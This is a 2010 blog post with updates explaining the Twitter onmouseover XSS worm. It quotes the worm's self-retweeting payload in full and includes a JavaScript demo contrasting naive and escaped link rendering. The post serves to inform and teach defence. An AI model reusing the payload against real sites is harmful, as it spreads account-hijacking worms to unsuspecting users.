Twitter, Bugged? [Updated: 22/09/2010 11.00PM UTC +8:00]
Many users got excited when they first noticed delays and oddities on Twitter.com (constant fail whales, exceptionally long loads, a scrambled home page, and so on), thinking their turn to see #NewTwitter had finally arrived. The excitement did not last long.
What looked like an upgrade to Twitter.com turned sour for many within the past 5 to 10 minutes: Twitter is reported to have been hacked / bugged / exploited by @masta. Anyone who 'contracted' this disease automatically re-tweets the following:
http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit();"class="modal-overlay"/
It looks like a stray piece of broken JavaScript, but it is actually a link whose real destination is masked: the quote after the @ ends the link's address and the rest is read by the browser as a mouseover handler. Curious cats are diverted to external sites (update #2: mostly porn sites).
I call it… the Twithack!
“How does it happen?”
It all starts with a simple mouse rollover of a link on Twitter.com: no click is needed. @masta is using JavaScript planted in the tweet itself to do its client-side magic, riding on the page's own jQuery (the $(...) calls) and AJAX form submission, which is how every victim's account silently re-posts the same tweet. This also means you may want to steer clear of the web site for now and rely on third-party apps such as TweetDeck, Seesmic or whatever tool you prefer.
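To make the rollover mechanism concrete, here is an added example (my own illustration, not code from the original post and not Twitter's code) that reproduces the bug in miniature in plain JavaScript. The payload string is the one quoted above with its curly quotes straightened; the two renderers, the escaping helper and the attribute-listing check are constructed for this example, and the bug shape (a link sanitizer that stops a URL at the first space but does not encode a double quote inside it) is my reading of the payload, since the post itself only says it was an onMouseOver XSS. Nothing in the block contacts a.no or runs the handler; it only builds HTML strings and inspects them.

```javascript
// Added example: the Twitter onmouseover XSS at the HTML level, naive link
// rendering beside a hardened version. Not Twitter's code; names are invented.

// The worm payload as quoted in the post (constructed constant; never fetched).
// If this string is dropped unescaped into href="...", the first " after the @
// closes the href attribute and the rest becomes new attributes:
//   onmouseover = copy this link's text (the payload itself) into the compose
//                 box and submit the form, so the victim re-tweets the worm
//   class="modal-overlay" = presumably stretches the link over the page so a
//                           hover is almost guaranteed (cf. "blocks of color")
const PAYLOAD =
  'http://a.no/@"onmouseover=";$(\'textarea:first\').val(this.innerHTML);' +
  '$(\'.status-update-form\').submit();"class="modal-overlay"/';

// Naive renderer (the vulnerable shape): find http(s) URLs up to the first
// whitespace and splice them straight into an <a> tag. Quotes are not encoded.
function renderTweetNaive(text) {
  return text.replace(/https?:\/\/\S+/g, (url) => `<a href="${url}">${url}</a>`);
}

// Hardened renderer: every attribute value and text node is HTML-escaped, so
// a quote becomes &quot; and can no longer terminate the attribute. The URL is
// also parsed and only http(s) is linked; anything else stays plain text.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function renderTweetSafe(text) {
  return text.replace(/https?:\/\/\S+/g, (url) => {
    let parsed;
    try {
      parsed = new URL(url); // WHATWG parser also percent-encodes " in the path
    } catch (e) {
      return escapeHtml(url);
    }
    if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') {
      return escapeHtml(url);
    }
    return `<a href="${escapeHtml(parsed.href)}">${escapeHtml(url)}</a>`;
  });
}

// Check a tester might run over rendered output: list the attribute names of
// the first <a> tag. A clean render has exactly ['href']; the worm adds more.
function anchorAttributes(html) {
  const tag = html.match(/<a\s([^>]*)>/);
  if (!tag) return [];
  const names = [];
  const attr = /([a-zA-Z_:][-a-zA-Z0-9_:.]*)\s*=\s*"[^"]*"/g;
  let m;
  while ((m = attr.exec(tag[1])) !== null) names.push(m[1].toLowerCase());
  return names;
}

// Stand-alone run: show what each renderer produces for the worm payload.
console.log('naive :', anchorAttributes(renderTweetNaive(PAYLOAD)));
console.log('safe  :', anchorAttributes(renderTweetSafe(PAYLOAD)));
```

The naive renderer yields an anchor carrying href, onmouseover and class attributes, which is exactly the worm; the hardened one yields a single href whose value contains %22 and &quot; instead of raw quotes, so hovering it does nothing. The lesson is the usual one for XSS: escape for the exact context you are writing into (here, an HTML attribute value), rather than trusting that "it looks like a URL" is enough.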
“Oh no, I think I caught the bug! What do I do now?”
No lasting damage has been reported so far, so the motive behind this exploit remains unknown. Self-publicity, perhaps? @masta has the whole world talking about him, so he definitely succeeded at that.
[Update #1: this just in @ 10:12pm – 21st Sept 2010]
“Who or what is this @masta?”
Masta is the name given to the viral Twitter XSS worm spread by @masta, though it is also said that he did not create it. The underlying rollover flaw is Twitter's; @masta exploited it, to the mass dissatisfaction of Twitter users worldwide. It is even trending right now!
A more descriptive definition from Mashable: The flaw uses a JavaScript function called onMouseOver which creates an event when the mouse is passed over a chunk of text. We’ve seen the flaw being abused to launch simple pop-up windows, redirect users elsewhere (including porn sites), and we’ve also seen it used in combination with blocks of color, covering the true “intention” of the tweet.
“Great, I’m re-tweeting the tweet too! Is my account hacked?”
Whatever people think, it is again reported that accounts are not "hacked" in any sense (update #3: confirmed by Twitter). Still, do not click the re-tweeted links, just in case!
"Is there anything I can do?"
The popular thing to do right now is to block @masta on Twitter and delete the tweet from your own profile. Also, watch what you roll over on Twitter.com!
[Update #2: this just in @ 12:30am – 22nd Sept 2010]
News of the Twithack / exploit seems to be crossing borders by the second, with many venting their frustration at Twitter and @masta. Some even came up with their own explanations for the hack, just for laughs:
RT @Followcat: Twitter got hacked by a #Mouseover bug. “Mouse Over” is last thing I hear mice say on their walkie-talkies before I eat them.
RT @Lord_Voldemort7: Twitter got hacked. The birds got tired of taking shit from the whale & went rogue. The fail whale will now be replaced with the dark mark.
RT @BestWorstAdvice: Want to tell your ex how you really feel about them? Send them angry tweets and tell them “Sorry, my Twitter got hacked.”
RT @gthree_ca: Twitter got hacked?! Funny… everything else seems normal. I guess it wasn’t a sign of the apocalypse after all.
RT @official_shaw: Twitter got hacked today. Millions of twitterers were forced to talk to each other the old fashioned way. Through Facebook.
Plenty of others are disappointed to have missed the whole 'epidemic'! For the rest, it may even have been a fun experience.
Interestingly, it is reported that even Sarah Brown, wife of the former British Prime Minister, fell victim to this new Twitter attack: her Twitter page was tampered with in an attempt to redirect visitors to a hardc0re p0rn site based in Japan. That's obviously bad news for her more than one million followers. Since the re-tweeted links mostly pointed at Japanese sites, the attack is suspected to have originated in Japan.
“What are the recommended things to do if I’m affected?”
Trending now:
1. Use Twitter only through 3rd party tools
2. Block @masta on Twitter
3. Remove any tweets from your profile that carry the JavaScript link / code
4. Change your Twitter password (just in case) (update #3: the exploit does not compromise account details)
5. Spread the news to inform those that are unaware!
[Update #3: this just in @ 2:30am – 22nd Sept 2010]
Case closed! Twitter finally responded to say it has things under control, followed by a message on the Twitter status blog: "We've identified and are patching a XSS attack; as always, please message @safety if you have info regarding such an exploit". It is mentioned that the mouseover vulnerability was discovered a month ago and fixed, but a recent site update reintroduced the bug (and apparently this has nothing to do with #NewTwitter)!
Twitter also said that "we are not aware of any issues related to it that would cause harm to computers or their accounts. And, there is no need to change passwords because user account information was not compromised through this exploit". In other words, what happened earlier was confined to the page as rendered in the browser and did not touch the user records in Twitter's database. Still no word on the source or the intention, though.
Good to know the problem was resolved quickly! Read the full story from Twitter.
If you are still in the dark about what happened, or were too afraid to do anything while the bug was loose, Sophos made a video demonstrating the various effects seen during that memorable stretch:
[Update #4: this just in @ 11:00pm – 22nd Sept 2010]
A 17-year-old from Australia claimed he may have been the cause of Twitter users being exposed to yesterday's epidemic. He reportedly only wanted to test whether JavaScript would run in tweets, which eventually led to the 'announcement' that it was possible.
However, the person most likely behind the havoc is suspected to be Masato Kinugawa, a Japanese developer: he was the one who first reported this security flaw to Twitter on 14th August, after which it was patched, until the recent upgrade, when he may have found that it was exploitable again.
"So, all in all, I would think the entire sequence revolves around two geniuses wanting to test their skills, using Twitter as a platform when they found an exploitable point. Let's just hope they are not up to something else!"
“What’s next?”
We’ll be moving on in life, I’ll be off to visit Twitter.com and the birds will be tweeting their way through the new day on the web, yet again! :)